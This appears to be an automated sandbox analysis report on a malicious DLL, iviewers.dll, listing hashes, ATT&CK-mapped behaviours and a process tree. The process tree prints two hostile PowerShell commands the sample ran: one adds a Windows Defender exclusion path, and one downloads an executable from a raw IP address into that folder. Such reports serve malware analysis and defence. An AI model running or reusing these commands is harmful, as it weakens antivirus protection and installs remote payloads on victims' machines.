Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    19/12/2024, 07:25

General

  • Target

    iviewers.dll

  • Size

    6KB

  • MD5

    e017be56699801dc89a8d6d1724eb633

  • SHA1

    a7f7aae4744210db8ebaf4da06c167357bc71eca

  • SHA256

    aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564

  • SHA512

    2368425dadc7f22eb11532359d4d1aa97bf3e381f4fd7b62c587e1f8819ef64a0ff7fc75cc5948939fadebc423345ab65a1cd2799bb4136fbea89d1f75dfc8c8

  • SSDEEP

    96:fNnyOybUJQ23GgX791qKilsZODTgFZP/8R:fNnyOybrVO9QKilhfgFZP/u

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2732
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2944
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\lrak4gvn.ya5.exe'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2596
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 800
        3⤵
        • Program crash
        PID:2640

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    d843ad1d3a565ffd71df08167123e449

    SHA1

    da34109ca4b2d3b93676e2d9a722e5021bf09dc2

    SHA256

    7c8cf9821671b458f977437a505940f12a7428098d0d589f16abfb454d8b3b88

    SHA512

    31ac7fd3cfb1b0cca94a443bf112294ba3b19ea84f6b111c4becfa622540177ac1d9e7696c2011f9df426868c242ed2aa1eb8bb2010b686a0ace9be631ca2118

  • memory/2732-0-0x0000000000320000-0x000000000032A000-memory.dmp

    Filesize

    40KB

  • memory/2732-1-0x0000000074510000-0x000000007451A000-memory.dmp

    Filesize

    40KB